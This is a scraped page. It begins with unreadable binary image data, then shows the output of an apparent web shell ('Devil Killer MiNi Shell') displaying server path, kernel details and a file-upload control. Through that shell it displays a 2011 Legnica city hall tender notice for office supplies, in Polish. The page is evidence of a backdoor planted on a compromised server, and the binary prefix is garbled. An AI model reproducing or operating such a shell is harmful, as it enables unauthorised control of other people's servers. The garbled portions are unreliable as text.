JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110217/23850-N-2011.html

<p class="kh_header"><b>Legnica: Zakup i dostawa materiałów biurowych dla Urzędu Miasta Legnicy</b><br>
<b>Numer ogłoszenia: 23850 - 2011; data zamieszczenia: 17.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Legnicy , pl. Słowiański 8, 59-220 Legnica, woj. dolnośląskie, tel. 076 7212100, faks 076 7212115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.legnica.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów biurowych dla Urzędu Miasta Legnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa materiałów biurowych dla Urzędu Miasta Legnicy jak niżej :
1. Cienkopis jednorazowy typu Stabilo kolor czerwony, linia pisania nie grubsza niż 0,4 mm - 300 sztuk
2. Cienkopis jednorazowy typu Stabilo kolor czarny, linia pisania nie grubsza niż 0,4 mm - 400 sztuk
3. Cienkopis jednorazowy typu Stabilo kolor zielony, linia pisania nie grubsza niż 0,4 mm - 200 sztuk
4. Cienkopis jednorazowy typu  Stabilo tusz kolor niebieski, linia pisania nie grubsza niż 0,4 mm - 200 sztuk
5. Zakreślacz tekstu typu Stabilo linia szerokości nie mniej niż 5 mm, ścięta końcówka fluorescencyjne z tuszem na bazie wody do pisania na wszystkich rodzajach papieru , kolor zielony, ścięta końcówka - 100 sztuk
6. Zakreślacz tekstu typu Stabilo, linia szerokości nie mniej niż 5 mm, ścięta końcówka fluorescencyjne z tuszem na bazie wody do pisania na wszystkich rodzajach papieru, duża odporność na wysychanie,  kolor żółty, ścięta końcówka.- 200 sztuk
7. Zakreślacz tekstu, typu Stabilo, fluorescencyjny z tuszem na bazie wody. Do pisania na wszystkich rodzajach papieru. Duża odporność na wysychanie linia szerokości nie mniej niż 5 m, ścięta końcówka kolor różowy, ścięta końcówka- 100 sztuk
8. Markery typu Edding grube, wodoodporne, końcówka okrągła                           czarne - 200 sztuk; czerwone 50 sztuk, niebieskie 50 sztuk   
Marker permanentny typu Snowman ze ściętą końcówką gruby linia do 5mm do pisania: papier, drewno, plastik, szkło, wodoodporny, niezmywalny - czarny 10 sztuk                                                         
9. Długopisy automatyczne  typu ZENITH-7 niklowany klips, obrączka i okuwka (min 7 podstawowych kolorów obudowy), wkład metalowy wielkopojemny - 300 sztuk
10. Wkłady do długopisów typu  Zenith-7 / niebieskie,  wkład metalowy wielkopojemny - 250 sztuk
11. Wkłady do długopisów typu Zenith- / czarne,  wkład metalowy wielkopojemny - 500 sztuk
12. Naboje atramentowe typu Parker  pasujące do wszystkich modeli piór  Parker czarny- 10 opakowań po 5 sztuk
13. Naboje atramentowe typu Parker  pasujące do wszystkich modeli piór Parker  niebieski - 30 opakowań po 5 sztuk
14. Wkład do pióra kulkowego typu Parker, - niebieski  - - 30 opakowań po 5 sztuk
15.Naboje atramentowe pasujące  do wszystkich modeli  piór  typu Waterman  niebieski - 10 opakowań  po 5 sztuk
16. Ołówki typu Staedler odporne na złamania z grafitem klejonym na całej długości, z lakierowana końcówką, twardość HB /bez gumki/, zatemperowane - 200 sztuk
17. Grafity typu Laco, trwałe i elastyczne 0,5 o wysokiej wytrzymałości.- 50 opakowań
18. Pisaki kolorowe 6 szt. w komplecie - 2 komplety
19. Zeszyt A4, typu Unipap  brulion laminowany, kratka w twardej okładce, szyty, 96 kartek - gramatura papieru min. 65g/m2- 150 sztuk
20. Zeszyt A5, typu Unipap 16 k, kratka- gramatura papieru min. 65g/m2- 300 sztuk
21. Zeszyt A5 typu Unipap 32 k, kratka- gramatura papieru min. 65g/m2- 300 sztuk
22. Zeszyt A5, typu Unipap 60 k, kratka - gramatura papieru min. 65g/m2- 300 sztuk
23. Zeszyt A5 typu Unipap 96 k, kratka w twardej oprawie, kratka - gramatura papieru min. 65g/m2- 100 sztuk
24. Zeszyt A4 typu Unipap 192-200 k,  kratka w twardej oprawie, szyty  - gramatura papieru min. 65g/m2- 50 sztuk
25. Kołozeszyt oprawa twarda A4 160 kartek gramatura papieru min. 65g/m2- 5 sztuk
26. Kołozeszyt oprawa twarda A4 100 kartek gramatura papieru min. 65g/m2 - 5 sztuk
27. Kołozeszyt  oprawa twarda A5 96 kartek gramatura papieru min. 65g/m2- 10 sztuk
28. Bloczek samoprzylepny  kolorowe 450-kartkowe  żywe kolory 76x76- 100 sztuk
29. Koszulki groszkowe A4, wykonane z folii PP z perforacją grubość 55 mic. pakowane  po 100 szt. Pasujące do każdego segregatora, otwierane od góry.- 100 opakowań
30. Ofertówki foliowe na dokumenty i płyty CD, wpinane, format A4 ( pakowane po 5 sztuk)- 10 opakowań 
31. koszulka do segregatora na płyty CD, z możliwością przechowywania  do 2 sztuk płyt CD, przezroczysty materiał ( 10 szt.  opak) wym. 125mmx135mm - 3 opakowania
32. Skoroszyt oczkowy typu Unipap -pełny, biały tekturowy gramatura papieru nie niższa jak 300-345g/m2 kolor  biały 255x310mm. A4- 5000 sztuk
33. Skoroszyt wpinany, z wąsami. Do przechowywania i prezentowania dokumentów o formacie A4 wykonany z PCV, przednia okładka przeźroczysta, miękka, tylna kolorowa, z boczną perforacją umożliwiającą wpięcie do segregatora. Mix kolorów- 500 sztuk
34. Teczka do podpisu  typu  Eselte ,harmonijkowa z rozszerzanym grzbietem, min 20 przegródek, posiadających 3 otwory do podglądu zawartości. Twardy karton pokryty filią Format A4 - 30 sztuk
35. Teczka typu Unipap, jednostronnie bielona  wiązana biała, wykonana z kartonu nie mniej jak 350g/m2 na dokumenty, formatu A4 - 10000 sztuk
36. Teczka z gumką typu VauPe, wykonana z mocnego barwionego i lakierowanego kartonu o gramaturze 370 z 3-ma zakładkami chroniącymi dokumenty A4 przed zniszczeniem  mix kolorów - 50 sztuk
37. Teczka z skrzydłowa  na dokumenty wykonana z utwardzonego kartonu, pokryta folią, wewnątrz biała okleina, szer. grzbietu 40mm, zamykana na rzepy format A4, mix kolorów - 50 sztuk
38. Segregatory A4 typu Eselte z mechanizmem, z dwustronną wymienną etykietą na grzbiecie, otwór na palec, na dolnych krawędziach metalowe okucia, szer. grzbietu 75mm - Mix kolorów - 1600 sztuk
39. Segregatory A4 typu Eselte 2 ringowe, z dwustronną wymienną etykietą na grzbiecie, otwór na palec, na dolnych krawędziach metalowe okucia, szer. grzbietu 50mm - Mix kolorów - 250 sztuk
40. Segregatory A4 typu Eselte z mechanizmem, z dwustronną wymienną etykietą na grzbiecie, szer. grzbietu 35mm - kolorowe  - 50 sztuk
41. Półka biurowa na dokumenty wykonana z przeźroczystego polistyrenu o wysokiej wytrzymałości, formatu A4, z możliwością łączenia pionowo, z wycięciem na krótszym boku - sztuk
42. Rolki kasowe offset 57x 25mmtypu Emerson, wytwarzane z bezpyłowego i bezdrzewnego papieru o gramaturze 55g/m2, dł. 25 m, pakowane po 10 szt.  - 1000 sztuk
43. Taśma barwiąca do maszynki liczącej- nylon 13mm x 6m, czarno- czerwona typu Black Point - 20 sztuk
44. Rolka barwiąca  do kalkulatorów drukujących Citizen IR 40T C/C dwukolorowa do CX-123 - 20 sztuk
45. Przybornik na biurko bez wyposażenia z miejscem  na długopisy, zszywki, spinacze, kartki.-  30 sztuk
46. Klej biurowy w sztyfcie 35 g typu Bartex,   nietoksyczny, lepki bezbarwny, bezwonny. Do klejenia papieru, zdjęć, papieru kredowego - 200 sztuk
47. Taśma klejąca biurowa, przeźroczysta wąska 25/33mm/ uniwersalna - 100 sztuk
48. Pinezki do tablic korkowych (kolorowe) beczułki  po 60 sztuk w opakowaniu - 5 opakowań
49. Gumka do mazania ołówkowa typu Pentel  ZEH 0,5 -  100 sztuk
50. Gumki recepturki, elastyczne 60mm 1 kg  - 1 kg
51. Gumki recepturki, elastyczne 100mm 1 kg - 1 kg
52. Grzbiety do bindownia  (100 szt.), plastikowe 12,5mm średnica - 5 opakowań;  25 mm średnica - 5 opakowań
53. Grzbiety wsuwane format A4, w formie plastikowej rynienki, w którą można wsunąć (oprawić) plik kartek, zaokrąglone końcówki ułatwiające wkładanie dokumentów ( do oprawy max 50 kartek) op. 50 szt.Granat - 2 opakowania
54. Grzbiety wsuwane format A4, w formie plastikowej rynienki, w którą można wsunąć (oprawić) plik kartek, zaokrąglone końcówki ułatwiające wkładanie dokumentów ( do oprawy max 30 kartek) / op. 50 szt. granat - 2 opakowania
55. Antystatyczna folia do laminacji  111 x 154 mm, błyszcząca , (2x125 mic.) Format A6 op. 100szt. - 8 opakowań
56. Antystatyczna folia do laminacji  111 x 154 mm, błyszcząca , (2x125 mic.) Format A6 op. 100szt.- 10 opakowań
57. Okładka do bindowania bezbarwna, z PCV 200mic.Format A4 (opakowanie  100 szt.) - 10 opakowań
58. Okładka do bindowania kartonowa o fakturze skóropodobnej, mix kolorów, gr. Min.250g, A4 (op. 100 szt.) - 10 opakowań
59. Poduszka do stempli typu Trodat , zamykana, wykonana z materiału magazynującego wilgoć - odporna na wysychanie, nasączona tuszem w kolorze czerwonym, wymiar 110 x70 plastykowa - 10 sztuk
60. Zszywacz metalowy typu Rapescko w plastikowej obudowie o wysokiej wytrzymałości, możliwość zaginania zszywek do wewnątrz lub zewnątrz, zszywający co najmniej 50 kartek., mix kolorów obudowy. .Mechanizm na zszywki 24/6.  3 lata gwarancji - 20 sztuk
61. Dziurkacz biurowy typu Eagle 837XL do akt dziurkujący co najmniej 50 kartek, żeliwne ramię, regulowany rozstaw 70/80 mm z ogranicznikiem formatu, wskaźnikiem środka strony. Konstrukcja wykonana z metalu wykończenia z  tworzyw sztucznych o wysokiej wytrzymałości,., pojemnik na ścinki. 3 lata  gwarancji. - 30 sztuk
62. Zszywki 23/10 miedziowane typu Staples ( x 1000)- 30 sztuk
63. Nożyczki z satynowym ostrzem wykonanym z nierdzewnej stali, wyprofilowana rękojeść wykonana z niełamliwego plastiku dł. ostrza 21cm - 20 sztuk
64. Wąsy do skoroszytów typu Durable, wąs metalowy, wytrzymała plastikowa podkładka, pakowane po 25 szt. - 17 opakowań 
65. Nawilżacz do palców, bezbarwny, bezwonny, na bazie gliceryny poj.20 ml. - 20 sztuk
66. Papier ksero tupu Pollux A4 500 kartek w ryzie (przeznaczony do dwustronnego kopiowania w kserokopiarkach, oraz do drukowania w drukach laserowych i  atramentowych), klasa nie niższa niż A, gramatura 80 g/m2  (+/-2), białość CIE nie niższa jak 166 (+/-2), nieprzezroczystość min. 91%, wilgotność 3,8 - 5%, bezpyłowy - 4.000 ryz
67. Papier ksero typu Pollux A3 500 kartek w ryzie (przeznaczony do dwustronnego kopiowania w kserokopiarkach, oraz do drukowania w drukach laserowych i atramentowych ), klasa nie niższa niż A, gramatura 80 g/m2  (+/-2), białość CIE nie niższa jak 166 (+/-2), nieprzezroczystość min 91%, wilgotność 3,8 - 5%, bezpyłowy - 200 ryz
68. Papier A4 250 kartek w ryzie gramatura 160g/m2 kolor różowy - 2 ryzy
69. Papier A4 250 kartek w ryzie gramatura 250 g/m kolor biały . Do wydruków czarno-białych, druk laserowy, atramentowy - 2 ryzy
70. Papier komputerowy składany z perforacją typu Emmerson lub Drescher- bezdrzewny, bezpyłowy i bezchlorkowy, 240mm (1+0) 60g/m2 ilość składek 2000  matowy do drukarek igłowych - 50 k
71. Papier komputerowy składany z perforacją typu Emmerson, lub Drescher bezdrzewny, bezpyłowy i bezchlorkowy 390mm (1+2) (oryginał + kopia kolorowa), ilość składek 600 matowy do drukarek igłowych                 - 5 k
72. Etykiety samoprzylepne uniwersalne  Px 5196(105x74mm, op. x 100 A4 - 3 opakowania
73. Etykiety samoprzylepne uniwersalne Px 5203 (210x148) op. X 100 A4 - 3 opakowania
74. Koperta C6 biała  SK (114mmx162mm) samoklejąca, bez nadruków, wykonana z papieru białego offsetowego o gramaturze nie niższej niż 75g/m2 (1000 szt.) - 50.000 sztuk
75. Koperta DL biała  SK , z okienkiem lewym np. (110mmx220mm) samoklejąca, bez nadruków, wykonana z papieru offsetowego o gramaturze nie niższej niż 75g/m2 (op. 1000 szt.)-  20.000 sztuk
76. Koperta DL biała SK z okienkiem prawym (110mmx220mm) samoklejąca, bez nadruków, wykonana z papieru offsetowego o gramaturze nie niższej niż 75 g/m2 (pak 1000) - 5.000 sztuk
77. Koperta DL ,b/okienka SK (110mmx220mm), samoklejąca, bez nadruków, wykonana z papieru offsetowego o gramaturze nie niższej niż 75g/m2 (pok.1000szt.) - 3.000  sztuk
78. Koperta B5 biała HK (176mmx250mm) op.500 szt. - 6.000 sztuk
79. Koperta B4 brązowa HK (250mmx353mm) (op. 250 szt.) - 5.000 sztuk
80. Koperta bąbelkowa biała  (230 x 340) bez okienka, bez nadruku- 100 sztuk
81. Koperta bąbelkowa biała (300 x 445), bez nadruku - 10 sztuk
82. Koperta bąbelkowa  biała ( 180x 265) bez nadruku - 10 sztuk.

1. Zamawiający każdorazowo będzie składał, według potrzeb, pisemną specyfikację zamówienia 
(fax-em, emilem, pocztą), która będzie szczegółowo określała asortyment, rodzaj oraz ilość przedmiotu zamówienia.
2.Wykonawca zobowiązuje się do dostawy materiałów, określonych w specyfikacji zamówienia w terminie 
2  dni od daty złożenia przez Zamawiającego zamówienia.
3.Wykonawca zobowiązuje się dostarczyć na koszt własny (własnym transportem) materiały będące przedmiotem zamówienia do siedziby Zamawiającego i złożyć je w miejscu wskazanym przez osobę zajmującą się zamówieniem.
4.Zamawiający zobowiązany jest odebrać od Wykonawcy dostarczone materiały protokołem zdawczo-odbiorczym  zgodnie z fakturą dostawy.

Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie- należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o parametrach technicznych, eksploatacyjnych i użytkowych nie gorszych niż zaproponowane przez Zamawiającego.

Do oferty należy załączyć także próbki poniższych produktów - po jednej sztuce:
- cienkopis jednorazowy typu Stabilo kolor czerwony, linia pisania nie grubsza niż 0,4 mm
- zakreślacz tekstu typu Stabilo, linia szerokości nie mniej niż 5 mm, ścięta końcówka fluorescencyjne z tuszem na bazie wody do pisania na wszystkich rodzajach papieru, duża odporność na wysychanie,  kolor żółty, ścięta końcówka.
- długopis automatyczny  typu ZENITH-7 niklowany klips, obrączka i okuwka, wkład metalowy wielkopojemny
- wkład do długopisów typu  Zenith-7 / niebieski,  wkład metalowy wielkopojemny
- ołówek typu Staedler odporny na złamania z grafitem klejonym na całej długości, z lakierowana końcówką, twardość HB /bez gumki/, zatemperowany
- koszulka groszkowe A4, wykonana z folii PP z perforacją grubość 55 mic., otwierana od góry.
- skoroszyt oczkowy typu Unipap -pełny, biały tekturowy gramatura papieru nie niższa jak 300-345g/m2 kolor  biały 255x310mm. A4
- teczka do podpisu  typu  Eselte ,harmonijkowa z rozszerzanym grzbietem, min 20 przegródek, posiadających 3 otwory do podglądu zawartości. Twardy karton pokryty filią Format A4
- teczka typu Unipap, jednostronnie bielona  wiązana biała, wykonana z kartonu nie mniej jak 350g/m2 na dokumenty, formatu A4
- segregatory A4 typu Eselte z mechanizmem, z dwustronną wymienną etykietą na grzbiecie, otwór na palec, na dolnych krawędziach metalowe okucia, szer. grzbietu 75mm 
- klej biurowy w sztyfcie 35 g typu Bartex,   nietoksyczny, lepki bezbarwny, bezwonny,
- taśma klejąca biurowa, przeźroczysta wąska 25/33mm/ uniwersalna.
- poduszka do stempli typu Trodat , zamykana, wykonana z materiału magazynującego wilgoć - odporna na wysychanie, nasączona tuszem w kolorze czerwonym, wymiar 110 x70 plastykowa
- zszywacz metalowy typu Rapescko w plastikowej obudowie o wysokiej wytrzymałości, możliwość zaginania zszywek do wewnątrz lub zewnątrz, zszywający co najmniej 50 kartek., mix kolorów obudowy. .Mechanizm na zszywki 24/6.
- dziurkacz biurowy typu Eagle 837XL do akt dziurkujący co najmniej 50 kartek, żeliwne ramię, regulowany rozstaw 70/80 mm z ogranicznikiem formatu, wskaźnikiem środka strony. Konstrukcja wykonana z metalu wykończenia z  tworzyw sztucznych o wysokiej wytrzymałości,., pojemnik na ścinki.
- zszywki 23/10 miedziowane typu Staples ( x 1000)
- nożyczki z satynowym ostrzem wykonanym z nierdzewnej stali, wyprofilowana rękojeść wykonana z niełamliwego plastiku dł. ostrza 21cm

W stosunku do papieru kserograficznego należy załączyć do oferty :
Specyfikację techniczną wydaną przez producenta zawierającą nazwę handlową i parametry techniczno - jakościowe proponowanego w ofercie papieru kserograficznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2, 30.19.93.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają  poniższy warunek udziału w postępowaniu:
Posiadania wiedzy i doświadczenia tj. jako Wykonawca wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 3 zamówienia obejmujące dostawę materiałów biurowych o wartości min. 50.000,- zł brutto każde - z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane lub są wykonywane  należycie. 
Ocena spełnienia warunku według :
a)  oświadczenia Wykonawcy- załącznik nr 1 do Instrukcji dla Wykonawców - Rozdział 2 siwz.      
b) wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, - z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz  z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane lub są wykonywane  należycie -  załącznik nr 3 do Instrukcji dla Wykonawców - Rozdział 2 siwz. + dokumenty potwierdzające, że  dostawy zostały wykonane 
lub są wykonywane  należycie        
Ocena spełnienia w/w warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

